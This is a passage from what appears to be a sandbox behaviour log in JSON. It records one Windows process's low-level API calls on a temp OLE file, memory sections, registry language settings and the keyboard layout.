"return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000270" }, { "name": "HandleName", "value": "C:\\Users\\pacop\\AppData\\Local\\Temp\\~DF888F0BBEA54E1504.TMP" }, { "name": "FileInformationClass", "value": "20", "pretty_value": "FileEndOfFileInformation" }, { "name": "FileInformation", "value": "\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 328 }, { "timestamp": "2025-02-27 23:34:15,706", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "filesystem", "api": "NtSetInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000270" }, { "name": "HandleName", "value": "C:\\Users\\pacop\\AppData\\Local\\Temp\\~DF888F0BBEA54E1504.TMP" }, { "name": "FileInformationClass", "value": "19", "pretty_value": "FileAllocationInformation" }, { "name": "FileInformation", "value": "\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 329 }, { "timestamp": "2025-02-27 23:34:15,706", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "filesystem", "api": "NtSetInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000270" }, { "name": "HandleName", "value": "C:\\Users\\pacop\\AppData\\Local\\Temp\\~DF888F0BBEA54E1504.TMP" }, { "name": "FileInformationClass", "value": "14", "pretty_value": "FilePositionInformation" }, { "name": "FileInformation", "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 330 }, { "timestamp": "2025-02-27 23:34:15,706", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "misc", "api": "GlobalMemoryStatus", "status": true, "return": "0x00000001", "arguments": [ { "name": "MemoryLoad", "value": "57" }, { "name": "TotalPhysicalMB", "value": "0" } ], "repeated": 0, "id": 331 }, { "timestamp": "2025-02-27 23:34:15,706", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "process", "api": "NtCreateSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x00000274" }, { "name": "DesiredAccess", "value": "0x000f0007", "pretty_value": "STANDARD_RIGHTS_REQUIRED|SECTION_QUERY|SECTION_MAP_READ|SECTION_MAP_WRITE" }, { "name": "ObjectAttributes", "value": "" }, { "name": "FileHandle", "value": "0x00000270" } ], "repeated": 0, "id": 332 }, { "timestamp": "2025-02-27 23:34:15,706", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "process", "api": "NtMapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x00000274" }, { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x055f0000" }, { "name": "SectionOffset", "value": "0x0019f3f8" }, { "name": "ViewSize", "value": "0x00080000" }, { "name": "Win32Protect", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 333 }, { "timestamp": "2025-02-27 23:34:15,706", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "\\xc8\\xf6\\x19\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x008\\x00F\\x000\\x00B\\x00B\\x00E\\x00A\\x005\\x004\\x00E\\x001\\x005\\x000\\x004\\x00.\\x00T\\x00M\\x00P\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 334 }, { "timestamp": "2025-02-27 23:34:15,706", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "synchronization", "api": "NtCreateEvent", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000278" }, { "name": "EventName", "value": "OleDfRootFA851EF1A2290D48" }, { "name": "EventType", "value": "1" }, { "name": "InitialState", "value": "0" } ], "repeated": 0, "id": 335 }, { "timestamp": "2025-02-27 23:34:15,706", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "filesystem", "api": "NtQueryInformationFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000270" }, { "name": "HandleName", "value": "C:\\Users\\pacop\\AppData\\Local\\Temp\\~DF888F0BBEA54E1504.TMP" }, { "name": "FileInformationClass", "value": "4", "pretty_value": "FileBasicInformation" }, { "name": "FileInformation", "value": "\\x08\\xder\\xbbg\\x89\\xdb\\x01\\x08\\xder\\xbbg\\x89\\xdb\\x01\\x08\\xder\\xbbg\\x89\\xdb\\x01\\x08\\xder\\xbbg\\x89\\xdb\\x01 \\x00\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 336 }, { "timestamp": "2025-02-27 23:34:15,706", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x055f0000" }, { "name": "RegionSize", "value": "0x00004000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 337 }, { "timestamp": "2025-02-27 23:34:15,706", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x00730000" }, { "name": "RegionSize", "value": "0x00001000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 338 }, { "timestamp": "2025-02-27 23:34:15,706", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x051f0000" }, { "name": "RegionSize", "value": "0x00006000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 339 }, { "timestamp": "2025-02-27 23:34:15,706", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "ole32.dll" }, { "name": "ModuleHandle", "value": "0x752d0000" } ], "repeated": 0, "id": 340 }, { "timestamp": "2025-02-27 23:34:15,706", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x76279000" }, { "name": "ModuleName", "value": "coml2.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 341 }, { "timestamp": "2025-02-27 23:34:15,706", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x76279000" }, { "name": "ModuleName", "value": "coml2.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 342 }, { "timestamp": "2025-02-27 23:34:15,706", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x00731000" }, { "name": "RegionSize", "value": "0x00003000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 343 }, { "timestamp": "2025-02-27 23:34:15,706", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x05670000" }, { "name": "RegionSize", "value": "0x00080000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 344 }, { "timestamp": "2025-02-27 23:34:15,706", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x05670000" }, { "name": "RegionSize", "value": "0x00001000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 345 }, { "timestamp": "2025-02-27 23:34:15,706", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "process", "api": "NtOpenSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x0000027c" }, { "name": "DesiredAccess", "value": "0x00000004" }, { "name": "ObjectAttributes", "value": "\\Sessions\\1\\Windows\\ThemeSection" } ], "repeated": 0, "id": 346 }, { "timestamp": "2025-02-27 23:34:15,706", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "process", "api": "NtMapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x0000027c" }, { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x023b0000" }, { "name": "SectionOffset", "value": "0x0019e95c" }, { "name": "ViewSize", "value": "0x00001000" }, { "name": "Win32Protect", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 347 }, { "timestamp": "2025-02-27 23:34:15,706", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "process", "api": "NtOpenSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x00000280" }, { "name": "DesiredAccess", "value": "0x00000004" }, { "name": "ObjectAttributes", "value": "\\Windows\\Theme687536163" } ], "repeated": 0, "id": 348 }, { "timestamp": "2025-02-27 23:34:15,706", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "process", "api": "NtOpenSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x00000284" }, { "name": "DesiredAccess", "value": "0x00000004" }, { "name": "ObjectAttributes", "value": "\\Sessions\\1\\Windows\\Theme950902373" } ], "repeated": 0, "id": 349 }, { "timestamp": "2025-02-27 23:34:15,706", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "process", "api": "NtUnmapViewOfSectionEx", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x023b0000" }, { "name": "RegionSize", "value": "0x00001000" }, { "name": "Flags", "value": "0" } ], "repeated": 0, "id": 350 }, { "timestamp": "2025-02-27 23:34:15,706", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000027c" } ], "repeated": 0, "id": 351 }, { "timestamp": "2025-02-27 23:34:15,706", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "process", "api": "NtMapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x00000280" }, { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x056f0000" }, { "name": "SectionOffset", "value": "0x0019efe8" }, { "name": "ViewSize", "value": "0x00a00000" }, { "name": "Win32Protect", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 352 }, { "timestamp": "2025-02-27 23:34:15,706", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "process", "api": "NtMapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x00000284" }, { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x023b0000" }, { "name": "SectionOffset", "value": "0x0019efe8" }, { "name": "ViewSize", "value": "0x00004000" }, { "name": "Win32Protect", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 353 }, { "timestamp": "2025-02-27 23:34:15,706", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "ntdll.dll" }, { "name": "ModuleHandle", "value": "0x77150000" } ], "repeated": 0, "id": 354 }, { "timestamp": "2025-02-27 23:34:15,706", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ntdll.dll" }, { "name": "ModuleHandle", "value": "0x77150000" }, { "name": "FunctionName", "value": "RtlRegisterFeatureConfigurationChangeNotification" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x77182560" } ], "repeated": 0, "id": 355 }, { "timestamp": "2025-02-27 23:34:15,706", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ntdll.dll" }, { "name": "ModuleHandle", "value": "0x77150000" }, { "name": "FunctionName", "value": "NtQueryWnfStateData" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x771c4820" } ], "repeated": 0, "id": 356 }, { "timestamp": "2025-02-27 23:34:15,706", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ntdll.dll" }, { "name": "ModuleHandle", "value": "0x77150000" }, { "name": "FunctionName", "value": "RtlSubscribeWnfStateChangeNotification" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x77180780" } ], "repeated": 0, "id": 357 }, { "timestamp": "2025-02-27 23:34:15,706", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ntdll.dll" }, { "name": "ModuleHandle", "value": "0x77150000" }, { "name": "FunctionName", "value": "RtlDisownModuleHeapAllocation" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x771bc9f0" } ], "repeated": 0, "id": 358 }, { "timestamp": "2025-02-27 23:34:15,706", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ntdll.dll" }, { "name": "ModuleHandle", "value": "0x77150000" }, { "name": "FunctionName", "value": "RtlQueryFeatureConfiguration" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x771b5a30" } ], "repeated": 0, "id": 359 }, { "timestamp": "2025-02-27 23:34:15,706", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ntdll.dll" }, { "name": "ModuleHandle", "value": "0x77150000" }, { "name": "FunctionName", "value": "RtlDllShutdownInProgress" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x771afa60" } ], "repeated": 0, "id": 360 }, { "timestamp": "2025-02-27 23:34:15,706", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "synchronization", "api": "NtCreateMutant", "status": true, "return": "0x40000000", "arguments": [ { "name": "Handle", "value": "0x0000027c" }, { "name": "MutexName", "value": "Local\\SM0:9224:168:WilStaging_02" }, { "name": "InitialOwner", "value": "0" } ], "repeated": 0, "id": 361 }, { "timestamp": "2025-02-27 23:34:15,706", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "system", "api": "NtWaitForSingleObject", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000027c" }, { "name": "Milliseconds", "value": "18446744073709551615" }, { "name": "Status", "value": "Infinite" } ], "repeated": 0, "id": 362 }, { "timestamp": "2025-02-27 23:34:15,706", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "system", "api": "GetSystemTimeAsFileTime", "status": true, "return": "0x00000000", "arguments": [], "repeated": 0, "id": 363 }, { "timestamp": "2025-02-27 23:34:15,706", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "system", "api": "NtWaitForSingleObject", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000288" }, { "name": "Milliseconds", "value": "0" } ], "repeated": 0, "id": 364 }, { "timestamp": "2025-02-27 23:34:15,706", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000288" } ], "repeated": 0, "id": 365 }, { "timestamp": "2025-02-27 23:34:15,706", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "synchronization", "api": "NtReleaseMutant", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000027c" } ], "repeated": 1, "id": 366 }, { "timestamp": "2025-02-27 23:34:15,706", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "registry", "api": "NtOpenKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000288" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x00000000" }, { "name": "ObjectAttributesName", "value": "\\Registry\\Machine\\Software\\Microsoft\\LanguageOverlay\\OverlayPackages\\es-ES" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\LanguageOverlay\\OverlayPackages\\es-ES" } ], "repeated": 0, "id": 367 }, { "timestamp": "2025-02-27 23:34:15,706", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "registry", "api": "NtQueryValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000288" }, { "name": "ValueName", "value": "Latest" }, { "name": "Type", "value": "1", "pretty_value": "REG_SZ" }, { "name": "Information", "value": "C:\\Program Files\\WindowsApps\\Microsoft.LanguageExperiencePackes-ES_19041.80.278.0_neutral__8wekyb3d8bbwe" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\LanguageOverlay\\OverlayPackages\\es-ES\\Latest" } ], "repeated": 0, "id": 368 }, { "timestamp": "2025-02-27 23:34:15,706", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000288" } ], "repeated": 0, "id": 369 }, { "timestamp": "2025-02-27 23:34:15,706", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "filesystem", "api": "NtOpenFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000288" }, { "name": "DesiredAccess", "value": "0x00100001", "pretty_value": "FILE_READ_ACCESS|SYNCHRONIZE" }, { "name": "FileName", "value": "C:\\Program Files\\WindowsApps\\Microsoft.LanguageExperiencePackes-ES_19041.80.278.0_neutral__8wekyb3d8bbwe\\Windows\\System32\\es-ES\\USER32.dll.mui" }, { "name": "ShareAccess", "value": "5", "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" } ], "repeated": 0, "id": 370 }, { "timestamp": "2025-02-27 23:34:15,706", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "process", "api": "NtCreateSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x0000028c" }, { "name": "DesiredAccess", "value": "0x000f0005", "pretty_value": "STANDARD_RIGHTS_REQUIRED|SECTION_QUERY|SECTION_MAP_READ" }, { "name": "ObjectAttributes", "value": "" }, { "name": "FileHandle", "value": "0x00000288" } ], "repeated": 0, "id": 371 }, { "timestamp": "2025-02-27 23:34:15,706", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "process", "api": "NtMapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x0000028c" }, { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x023c0000" }, { "name": "SectionOffset", "value": "0x0019e360" }, { "name": "ViewSize", "value": "0x00008000" }, { "name": "Win32Protect", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 372 }, { "timestamp": "2025-02-27 23:34:15,706", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000028c" } ], "repeated": 0, "id": 373 }, { "timestamp": "2025-02-27 23:34:15,706", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x02401000" }, { "name": "RegionSize", "value": "0x00001000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 374 }, { "timestamp": "2025-02-27 23:34:15,706", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x02402000" }, { "name": "RegionSize", "value": "0x00002000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 375 }, { "timestamp": "2025-02-27 23:34:15,706", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "registry", "api": "NtOpenKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x0000028c" }, { "name": "DesiredAccess", "value": "0x00000009", "pretty_value": "KEY_QUERY_VALUE|KEY_ENUMERATE_SUB_KEYS" }, { "name": "ObjectAttributesHandle", "value": "0x00000000" }, { "name": "ObjectAttributesName", "value": "\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\Session Manager" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Session Manager" } ], "repeated": 0, "id": 376 }, { "timestamp": "2025-02-27 23:34:15,706", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "registry", "api": "NtQueryValueKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x0000028c" }, { "name": "ValueName", "value": "ResourcePolicies" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Session Manager\\ResourcePolicies" } ], "repeated": 0, "id": 377 }, { "timestamp": "2025-02-27 23:34:15,706", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000028c" } ], "repeated": 0, "id": 378 }, { "timestamp": "2025-02-27 23:34:15,706", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x023d0000" }, { "name": "RegionSize", "value": "0x00008000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 379 }, { "timestamp": "2025-02-27 23:34:15,706", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x023d0000" }, { "name": "RegionSize", "value": "0x00001000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 380 }, { "timestamp": "2025-02-27 23:34:15,706", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x02404000" }, { "name": "RegionSize", "value": "0x00001000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 381 }, { "timestamp": "2025-02-27 23:34:15,706", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x02405000" }, { "name": "RegionSize", "value": "0x00001000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 382 }, { "timestamp": "2025-02-27 23:34:15,722", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7707f000" }, { "name": "ModuleName", "value": "GDI32.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 383 }, { "timestamp": "2025-02-27 23:34:15,722", "thread_id": "3892", "caller": "0x004011ce", "parentcaller": "0x00000000", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7707f000" }, { "name": "ModuleName", "value": "GDI32.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 384 }, { "timestamp": "2025-02-27 23:34:15,722", "thread_id": "3892", "caller": "0x7573326d", "parentcaller": "0x75732de1", "category": "misc", "api": "GetKeyboardLayout", "status": true, "return": "0x040a0c0a", "arguments": [ { "name": "KeyboardLayout", "value": "0x00000c0a" }, { "name": "LanguageName", "value": "Spanish (Spain)" } ], "repeated": 0, "id": 385 }, { "timestamp": "2025-02-27 23:34:15,722", "thread_id": "3892", "caller": "0x771a671a", "parentcaller": "0x7651129a", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000028c" } ], "repeated": 0, "id": 386 }, { "timestamp": "2025-02-27 23:34:15,722", "thread_id": "3892", "caller": "0x771a6741", "parentcaller": "0x7651129a", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000290" } ], "repeated": 0, "id": 387 }, { "timestamp": "2025-02-27 23:34:15,722", "thread_id": "3892", "caller": "0x764f3bc1", "parentcaller": "0x764f399b", "category": "misc", "api": "RtlSetCurrentTransaction", "status": true, "return": "0x00000001", "arguments": [ { "name": "TransactionHandle", "value": "0x00000000" } ], "repeated": 1, 